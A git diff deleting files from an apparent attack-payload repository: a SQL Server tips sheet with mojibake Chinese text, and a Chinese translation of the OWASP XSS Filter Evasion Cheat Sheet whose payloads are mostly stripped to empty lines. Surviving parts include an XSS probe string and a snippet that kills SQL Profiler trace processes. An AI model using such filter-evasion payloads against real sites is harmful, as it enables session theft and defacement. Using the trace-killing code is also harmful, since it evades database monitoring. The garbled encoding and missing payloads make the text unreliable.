- -14˵ǰ10¼ -select top 10 * form table1 where Χ - -15˵ѡÿһbֵͬжӦaļ¼Ϣ(÷̳ÿа,ÿƷ,Ŀɼ,ȵ.) -select a,b,c from tablename ta where a=(select max(a) from tablename tb where tb.b=ta.b) - -16˵ TableAе TableBTableCевظжһ -(select a from tableA ) except (select a from tableB) except (select a from tableC) - -17˵ȡ10 -select top 10 * from tablename order by newid() - -18˵ѡ¼ -select newid() - -19˵ɾظ¼ -1),delete from tablename where id not in (select max(id) from tablename group by col1,col2,...) -2),select distinct * into temp from tablename - delete from tablename - insert into tablename select * from temp -ۣ ֲǣݵƶʺϴݲ -3),磺һⲿеݣijЩԭһֻһ֣жϾλãֻһȫ룬ҲͲöظֶΣɾظֶ - -alter table tablename ---һ -add column_b int identity(1,1) - delete from tablename where column_b not in( -select max(column_b) from tablename group by column1,column2,...) -alter table tablename drop column column_b - -20˵гݿеı -select name from sysobjects where type='U' // Uû - -21˵ге -select name from syscolumns where id=object_id('TableName') - -22˵ʾtypevenderpcsֶΣtypeֶУcaseԷʵֶѡselect еcase -select type,sum(case vender when 'A' then pcs else 0 end),sum(case vender when 'C' then pcs else 0 end),sum(case vender when 'B' then pcs else 0 end) FROM tablename group by type -ʾ -type vender pcs - A 1 - A 1 - B 2 - A 2 -ֻ B 3 -ֻ C 3 - -23˵ʼtable1 - -TRUNCATE TABLE table1 - -24˵ѡ1015ļ¼ -select top 5 * from (select top 15 * from table order by id asc) table_ order by id desc - - - -11=11=2ʹãSQLʱõĽ϶ - -where 1=1 DZʾѡȫ where 1=2ȫѡ -磺 -if @strWhere !='' -begin -set @strSQL = 'select count(*) as Total from [' + @tblName + '] where ' + @strWhere -end -else -begin -set @strSQL = 'select count(*) as Total from [' + @tblName + ']' -end - -ǿֱд -δҵĿ¼ -set @strSQL = 'select count(*) as Total from [' + @tblName + '] where 1=1 '+ @strWhere 2ݿ ---ؽ -DBCC REINDEX -DBCC INDEXDEFRAG ---ݺ־ -DBCC SHRINKDB -DBCC SHRINKFILE - -3ѹݿ -dbcc shrinkdatabase(dbname) - -4תݿûѴûȨ -exec sp_change_users_login 'update_one','newname','oldname' -go - -5鱸ݼ -RESTORE VERIFYONLY from disk='E:\dvbbs.bak' - -6޸ݿ -ALTER DATABASE [dvbbs] SET SINGLE_USER -GO -DBCC CHECKDB('dvbbs',repair_allow_data_loss) WITH TABLOCK -GO -ALTER DATABASE [dvbbs] SET MULTI_USER -GO - -7־ -SET NOCOUNT ON -DECLARE @LogicalFileName sysname, - @MaxMinutes INT, - @NewSize INT - -USE tablename -- Ҫݿ -SELECT @LogicalFileName = 'tablename_log', -- ־ļ -@MaxMinutes = 10, -- Limit on time allowed to wrap log. - @NewSize = 1 -- 趨־ļĴС(M) - -Setup / initialize -DECLARE @OriginalSize int -SELECT @OriginalSize = size - FROM sysfiles - WHERE name = @LogicalFileName -SELECT 'Original Size of ' + db_name() + ' LOG is ' + - CONVERT(VARCHAR(30),@OriginalSize) + ' 8K pages or ' + - CONVERT(VARCHAR(30),(@OriginalSize*8/1024)) + 'MB' - FROM sysfiles - WHERE name = @LogicalFileName -CREATE TABLE DummyTrans - (DummyColumn char (8000) not null) - -DECLARE @Counter INT, - @StartTime DATETIME, - @TruncLog VARCHAR(255) -SELECT @StartTime = GETDATE(), - @TruncLog = 'BACKUP LOG ' + db_name() + ' WITH TRUNCATE_ONLY' - -DBCC SHRINKFILE (@LogicalFileName, @NewSize) -EXEC (@TruncLog) --- Wrap the log if necessary. -WHILE @MaxMinutes > DATEDIFF (mi, @StartTime, GETDATE()) -- time has not expired - AND @OriginalSize = (SELECT size FROM sysfiles WHERE name = @LogicalFileName) - AND (@OriginalSize * 8 /1024) > @NewSize - BEGIN -- Outer loop. -SELECT @Counter = 0 - WHILE ((@Counter < @OriginalSize / 16) AND (@Counter < 50000)) - BEGIN -- update - INSERT DummyTrans VALUES ('Fill Log') DELETE DummyTrans - SELECT @Counter = @Counter + 1 - END - -SELECT 'Final Size of ' + db_name() + ' LOG is ' + - CONVERT(VARCHAR(30),size) + ' 8K pages or ' + - CONVERT(VARCHAR(30),(size*8/1024)) + 'MB' - FROM sysfiles - WHERE name = @LogicalFileName -DROP TABLE DummyTrans -SET NOCOUNT OFF - -8˵ij -exec sp_changeobjectowner 'tablename','dbo' - -9洢ȫ - -CREATE PROCEDURE dbo.User_ChangeObjectOwnerBatch -@OldOwner as NVARCHAR(128), -@NewOwner as NVARCHAR(128) -AS - -DECLARE @Name as NVARCHAR(128) -DECLARE @Owner as NVARCHAR(128) -DECLARE @OwnerName as NVARCHAR(128) - -DECLARE curObject CURSOR FOR -select 'Name' = name, - 'Owner' = user_name(uid) -from sysobjects -where user_name(uid)=@OldOwner -order by name - -OPEN curObject -FETCH NEXT FROM curObject INTO @Name, @Owner -WHILE(@@FETCH_STATUS=0) -BEGIN -if @Owner=@OldOwner - -begin - set @OwnerName = @OldOwner + '.' + rtrim(@Name) - exec sp_changeobjectowner @OwnerName, @NewOwner -end --- select @name,@NewOwner,@OldOwner - -FETCH NEXT FROM curObject INTO @Name, @Owner -END - -close curObject -deallocate curObject -GO - - -10SQL SERVERֱѭд -declare @i int -set @i=1 -while @i<30 -begin - insert into test (userid) values(@i) - set @i=@i+1 -end - -±ҪЛ]мijɿÿL0.1ĻAϣʹü: - - Name score - - Zhangshan 80 - - Lishi 59 - - Wangwu 50 - - Songquan 69 - -while((select min(score) from tb_table)<60) - -begin - -update tb_table set score =score*1.01 - -where score<60 - -if (select min(score) from tb_table)>60 - - break - - else - - continue - -end - - - -ݿ- - - -1.ϱʻ: -Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as //ٵ - -2.ݿ: -select encrypt('ԭʼ') -select pwdencrypt('ԭʼ') -select pwdcompare('ԭʼ','ܺ') = 1--ͬͬ encrypt('ԭʼ') -select pwdencrypt('ԭʼ') -select pwdcompare('ԭʼ','ܺ') = 1--ͬͬ - -3.ȡرֶ: -declare @list varchar(1000), -@sql nvarchar(1000) -select @list=@list+','+b.name from sysobjects a,syscolumns b where a.id=b.id and a.name='A' -set @sql='select '+right(@list,len(@list)-1)+' from A' -exec (@sql) - -4.鿴Ӳ̷: -EXEC master..xp_fixeddrives - -5.ȽA,BǷ: -if (select checksum_agg(binary_checksum(*)) from A) - = - (select checksum_agg(binary_checksum(*)) from B) -print '' -else -print '' - -6.ɱе¼̽: -DECLARE hcforeach CURSOR GLOBAL FOR SELECT 'kill '+RTRIM(spid) FROM master.dbo.sysprocesses -WHERE program_name IN('SQL profiler',N'SQL ¼̽') -EXEC sp_msforeach_worker '?' - -7.¼: -ͷN¼ -Select Top N * From -------------------------------- -NM¼(ҪID) -Select Top M-N * From Where ID in (Select Top M ID From ) Order by ID Desc ----------------------------------- -Nβ¼ -Select Top N * From Order by ID Desc - -1һűһ¼ĵһֶ RecID ֶΣ дһSQL䣬 ҳĵ3140¼ - - select top 10 recid from A where recid not in(select top 30 recid from A) - -дijЩ⣬recidڱд߼ - - select top 10 recid from A whereǴвңselect top 30 recid from Aݱвңе˳пܺݱеIJһ£͵²ѯIJDZõݡ - - - -1order by select top 30 recid from A order by ricid ֶβͻ - -2ǸӲѯҲselect top 30 recid from A where recid>-1 - -2ѯе¼֪ж,Լṹ -set @s = 'select top 1 * from T where pid not in (select top ' + str(@count-1) + ' pid from T)' - -print @s exec sp_executesql @s - -9ȡǰݿеû -select Name from sysobjects where xtype='u' and status>=0 - -10ȡijһֶ -select name from syscolumns where id=object_id('') - -select name from syscolumns where id in (select id from sysobjects where type = 'u' and name = '') - -ַʽЧͬ - -11鿴ijһصͼ洢̡ -select a.* from sysobjects a, syscomments b where a.id = b.id and b.text like '%%' - -12鿴ǰݿд洢 -select name as 洢 from sysobjects where xtype='P' - -13ѯûݿ -select * from master..sysdatabases D where sid not in(select sid from master..syslogins where name='sa') - -select dbid, name AS DB_NAME from master..sysdatabases where sid <> 0x01 - -14ѯijһֶκ -select column_name,data_type from information_schema.columns -where table_name = '' - -15ͬݿ֮ݲ - ---ӷ - -exec sp_addlinkedserver 'ITSV ', ' ', 'SQLOLEDB ', 'Զ̷ipַ ' - -exec sp_addlinkedsrvlogin 'ITSV ', 'false ',null, 'û ', ' ' - ---ѯʾ - -select * from ITSV.ݿ.dbo. - ---ʾ - -select * into from ITSV.ݿ.dbo. - ---Ժʹʱɾӷ - -exec sp_dropserver 'ITSV ', 'droplogins ' - - - ---Զ/(openrowset/openquery/opendatasource) - ---1openrowset - ---ѯʾ - -select * from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) - ---ɱر - -select * into from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) - - - ---ѱرԶ̱ - -insert openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.) - -select *from ر - ---±ر - -update b - -set b.A=a.A - - from openrowset( 'SQLOLEDB ', 'sql '; 'û '; ' ',ݿ.dbo.)as a inner join ر b - -on a.column1=b.column1 - ---openquery÷Ҫһ - ---ȴһӴӷ - -exec sp_addlinkedserver 'ITSV ', ' ', 'SQLOLEDB ', 'Զ̷ipַ ' - ---ѯ - -select * - -FROM openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') - ---ѱرԶ̱ - -insert openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') - -select * from ر - ---±ر - -update b - -set b.B=a.B - -FROM openquery(ITSV, 'SELECT * FROM ݿ.dbo. ') as a - -inner join ر b on a.A=b.A - - - ---3opendatasource/openrowset - -SELECT * - -FROM opendatasource( 'SQLOLEDB ', 'Data Source=ip/ServerName;User ID=½;Password= ' ).test.dbo.roy_ta - ---ѱرԶ̱ - -insert opendatasource( 'SQLOLEDB ', 'Data Source=ip/ServerName;User ID=½;Password= ').ݿ.dbo. - -select * from ر - -SQL Server - -SQL Server - -1.ַ - -1,datalength(Char_expr) ַַ,Ŀո -2,substring(expression,start,length) ȡӴַ±Ǵӡ1startΪʼλãlengthΪַȣʵӦlen(expression)ȡ䳤 -3,right(char_expr,int_expr) ַұߵint_exprַleft֮෴ -4,isnull( check_expression , replacement_value )check_expressionգtreplacement_valueֵգͷcheck_expressionַ - -5,Sp_addtypeԶx -磺EXEC sp_addtype birthday, datetime, 'NULL' - -6,set nocount {on|off} - -ʹصĽвй Transact-SQL ӰϢ洢аһЩ䲢ʵʵݣڴ˿ܡSET NOCOUNT ִлʱãڷʱáSET NOCOUNT Ϊ ON ʱؼʾ Transact-SQL Ӱ - - - -SET NOCOUNT - -Ϊ OFF ʱؼ - -ʶ - - - -SQLѯУfromԸűͼ256SQLг Order by,ѯʱ򣬺ȡSQLУһֶε8000nvarchar(4000),nvarcharUnicode롣 - - - -SQLServer2000 - -ͬƼʵֲ - -һ Ԥ - -1.,ķһͬwindowsû,ͬ,ΪļеЧû------û--Ҽû--½û--һadministratorĵ½windowsûSynUser2.ڷ,½һĿ¼,ΪĿļĴĿ¼,: - -ҵĵ--D:\ ½һĿ¼,Ϊ: PUB - ---Ҽ½Ŀ¼------ѡ"ļ"--ͨ"Ȩ"ŦþûȨ,֤һдû(SynUser) жԸļеȨ - - - ---ȷ3.SQL(SQLSERVERAGENT)û(/ķ) - -ʼ------ - ---ҼSQLSERVERAGENT----½--ѡ"˻"--ѡһдwindows¼ûSynUser--""û4.SQL Server֤ģʽ,ʱȨ(/ķ) - -ҵ - ---ҼSQLʵ----ȫ--֤--ѡ"SQL Server Windows"--ȷ5.ڷͶķϻע - -ҵ - ---ҼSQL Server--½SQL Serverע...--һ--õķ,ҪעԶ̷ ----һ--ʹ,ѡڶ"SQL Server֤"--һ--û루SynUser--һ--ѡSQL Server,ҲԴһ--һ--6.ֻIP,ü,Ϊע˲ʵʩûõ (Ӷ,,ڶķõĻ,ǷIP) - -ʼ----Microsoft SQL Server--ͻʵù - -------ѡ"tcp/ip"--SQL--Ӳ--SQLipַ--޸SQLĶ˿,ȡѡ"̬˿",ӦĶ˿ں - - ʽ - -1÷ - -ҵڷBCDִ²: - -(1) []˵[]Ӳ˵ѡ[÷ķͷַ]÷ͷַ(2) [һ] ѡַ ѡѷԼΪַsqlķѡԼ(3) [һ] ÿļ - -Ĭ\\servername\Pub - -(4) [һ] Զ - -ѡ:,÷ַݿ÷÷ - -,ʹĬãƼ - -(5) [һ] ÷ַݿƺλ Ĭֵ(6) [һ] ÷ ѡΪķ(7) [һ] ѡҪݿͷ(8) [һ] ѡעᶩķ(9) [һ] 2 - -BCD - -(1)[]˵[]Ӳ˵ѡ[͹](2)ѡҪݿ⣬Ȼ󵥻[](3)[]ʾԻе[һ]ϵͳͻᵯһԻ򡣶ԻϵǸƵ͡ѡһҲĬϵĿշ(ҿȥ)(4)[һ]ϵͳҪָԶĸ÷ݿ,SQLSERVERڲͬݿ orACLEACCESS֮ݸơ - -ѡ"SQL SERVER 2000"ݿ - -(5)[һ]ϵͳ͵һµĶԻҲѡҪı - -ע: ǰѡ񷢲 һֻѡı - -(6)ѡ񷢲ƺ(7)Զ巢 ṩѡ: - - ҽԶɸѡ,ĺͻԶ - - ָʽ Զķʽ - -(8)[һ] ѡɸѡķʽ(9)[һ] ѡǷ1)ѡ,ҪڷӶķ - -: []->[]->[÷ķͷַ]->[ķ] - -ڶķʱֵʾ:ķ - -ȻҪ½취 - -[ҵ]->[]->[]->[]->[ѡ] ѡ2)ѡ,öķʱʾ(10)[һ] ÿ (11)[һ] - -ɳĴ󴴽ݿҲͱһݿ - - - -srv1...authorֶ:id,name,phone, srv2...authorֶ:id,name,telphone,adress - - - -Ҫ - -srv1...authorӼ¼srv1...author¼srv1...authorphoneֶθ£srv1...authorӦֶtelphone - ---*/ - - - ---µĴ--1. srv1 ϴӷ,Ա srv1 в srv2,ʵͬexec sp_addlinkedserver 'srv2','','SQLOLEDB','srv2sqlʵip' exec sp_addlinkedsrvlogin 'srv2','false',null,'û','' - -go - ---2. srv1 srv2 ̨, msdtc(ֲʽ),ΪԶ - -ҵĵ--------Ҽ Distributed Transaction Coordinator------ΪԶ - -go - - - - - ---Ȼ󴴽һҵʱͬ洢̾ - - - -ҵ - -----SQL Server--Ҽҵ--½ҵ--""ҵ--""--½--""벽--""ѡ"Transact-SQL ű(TSQL)" --"ݿ"ѡִݿ--""Ҫִе: exec p_process --ȷ--""--½--""--""ѡҵִа--ѡ"" --""ʱ䰲 - - - -ȻSQL Agent,ΪԶ,ҵᱻִ - - -÷: - -ҵĵ--------Ҽ SQLSERVERAGENT------ѡ"Զ"--ȷ. - - ---3.ʵͬķ2,ʱͬ - - - ---srv1дµͬ洢 - -create proc p_process - -as - ---޸Ĺ - -update b set name=i.name,telphone=i.telphone - -from srv2..dbo.author b,author i - -where b.id=i.id and - -(b.name <> i.name or b.telphone <> i.telphone) - - - ---insert srv2..dbo.author(id,name,telphone) - -select id,name,telphone from author i - -where not exists( - -select * from srv2..dbo.author where id=i.id) - - - ---ɾѾɾ(ҪĻ) - -delete b - -from srv2..dbo.author b - -where not exists( - -select * from author where id=b.id) - -go diff --git a/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf b/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf deleted file mode 100644 index 6d7f2ec..0000000 Binary files a/payloads/XSS/EVADING ALL WEB-APPLICATION.pdf and /dev/null differ diff --git a/payloads/XSS/README.MD b/payloads/XSS/README.MD deleted file mode 100644 index 0f90f09..0000000 --- a/payloads/XSS/README.MD +++ /dev/null @@ -1 +0,0 @@ -# some useful payloads collected from internet may give you a hand.maybe it would do you a favorite diff --git a/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt b/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt deleted file mode 100644 index 0cd971c..0000000 --- a/payloads/XSS/XSS-Filter-Evasion-Cheat-Sheet-CN.txt +++ /dev/null @@ -1,817 +0,0 @@ -XSS Filter Evasion Cheat Sheet İ -================================== -Դĵַhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet - -ĵgithubַhttps://github.com/caomulaodao/XSS-Filter-Evasion-Cheat-Sheet-CN - ------ -##xss ̽## -עЩ룬ڴûxssҪܽűĵطᵯʡxssʹ[url][1]ȥ롣СɣǼеҪȥһҳ棬ֻͨҪע "<ַ>" ǩȻжǷܵžͿжǷxss©ˡ - - ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; - alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- - >">'> - -------- - -##xss ̽2## -ûгռȥҳǷxss©δһõļxssע롣עδ󣬲鿴ҳԴѰǷڿ =&{()} - ---------- - -##޹ƹ## -һxssע룬ȻͨᱻǽȥDzҪκִУʡ - - - -------- - -------- -##ͨjavascriptָʵֵͼƬxss## - -ͼƬxssjavascriptָʵ֡IE7.0֧javascriptָͼƬУǿĴչʾһǩͨõԭ - - - ------ -##޷ֺ## - - - ------ -##ִСдxss## - - - ------- -##html ʵ## -The semicolons are required for this to work: - - - ------ -#### -javascriptҪͬʱʹõź˫ţôʹ`javascript롣ҲdzΪxss˴δǵַ - - - ------ -##εAǩ## -hrefԣֱӻȡxssʵʹ...David Cross ~ ֤chrome - - xxs link - -⣬chromeϲȥȫȱʧΪ㡣谭ôֱʡǰɣchromeȷİ㲹ȫȱʧURLscriptС - - xxs link - ------- -##εIMGǩ## -类 Begeek֣ԶСɾκxssɢȾIMGǩбŰַʵ֡Ҳ²Ϊȷʵ֣ȥhtml - - "> - ------ -##fromCharCode## -ûκʽűeval()һfromCharCodejavascriptκҪxss - - - ------ -##ĬSRCȥƹSRC## -⽫ƹSRCjavascriptκһ¼ͬκһHTMLǩFormIframeInputEmbedȵȡҲκθñǩ¼ȥ滻onblur, onclickȣǻḽһõ¼бDavid CrossṩAbdullah Hussam༭ - - - ---- -##ĬSRCͨʡֵ## - - - ---- -##ĬSRCͨȫ## - - - ----- -##ͨerror¼alert## - - - ----- -##ʮhtml## -ʹjavascriptָxssʾ޷ Firefox Netscape 8.1+Ϊʹ Gecko Ⱦ档ʹ XSS [Calculator][2] ȡϢ - - - ------ -##βûзֺŵʮhtml## -ǾõƹѰ"&#XX;"ʽxssˣΪ˲֪7λַıơҲõĶЩַ$tmp_string =~ s/.*\&#(\d+);.*/$1/; Ĺ,ǴΪһhtmlҪ;ȥз֣ - - - ------ -##βûзֺŵʮhtml## -Ҳһʵõxssĵ$tmp_string =~ s/.*\&#(\d+);.*/$1/; Ϊֱ#棨ʮhtnl벢ˣʹ XSS [Calculator][3] ȡϢ - - - ----- -##ǶTAB## -ֿxss - - - ----- -##ǶTAB## -ֿxss - - - ------ -##Ƕзȥֿxss## -һЩվ09-13ַʮƣʵʽĹDzȷġֻ09(tab), 10 () 13 (س)ʹáԲ鿴asciiΪϸϢĸxssչʾ - - - ------- -##سȥֿxss## -ע⣺ұдxssַȱ볤ȵַԭ0ԱʡԡͨҿĹʮƺʮƵıַȷӦһ߸ַ - - - ----- -##ûзָjavascriptָ## -nullַҲΪһxssͬ档ҪֱעһЩBurp Proxyʹ %00 urlַдԼע빤ʹvim^V^@ nullԼijȥһıļСðɣһˡ Operaϰ汾Լ 7.11 on WindowsǴĶһַ173ַnullַ %00 Ǹӵû߰ƹijЩʵڵĹͨ䶯еġ - - perl -e 'print "";' > out - ------- -##IMGjavascript֮ǰӿոԪַΪxssƹ## -xssƴģʽûпǵ"javascript:"пܴڿոȷģΪ޷ȾҲ˴ļΪ㲻һոź "javascript:" ֮䡣ʵԲ 1-32ַʮƣеκַ - - - ------- -##ĸַxss## - Firefox htmlΪһĸַһhtmlؼвЧģЩַᱻΪհ׷Чtokenhtmlǩ֮⵼ºܶxssΪhtmlǩDZհ׷ϵġ磬" - -ԭͬǼGeckoȾĸ֡htmlװַκַλ¼Ⱥ֮䡣ǿƹxssעҲʾ - - - -Yair Amit ʾһС ieGecko Ⱦ֮ڲʹÿո£GeckoһбhtmlǩͲ֮䡣õЩոϵͳС - - - ------ -##Ŀ## - Franz SedlmaierxssƹijЩ棬ΪЩͨƴֵһԼţȡڲΪǩûʹøЧ㷨 Boyer-MooreѰҴ򿪵ļԼرǩģƴ䣩󣬴е˫бܿƶŵµjavascript - - < - ------- -##ûرյscriptǩ## -ʹ GeckoȾFirefox Netscape 8.1 㲢Ҫxss"></SCRIPT>"ⲿ֡ FirefoxպϱǩҼǩô Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. ҪԼţͨDZġע⣬Ҳ뱻עhtmlպϳʲôӡ - - ڽβ OperaǷdzõ볤ܵơԽԽá ".j"ЧģҪDZΪԶʶһscriptǩС - - - ------ -##INPUT image## - - - ------ -##BODY image## - - - ----- -##IMG DYNSRC(Ƶ) ## - - - ----- -##IMG lowsrcͷֱͼƬ## - - - ------ -##List-style-image## - -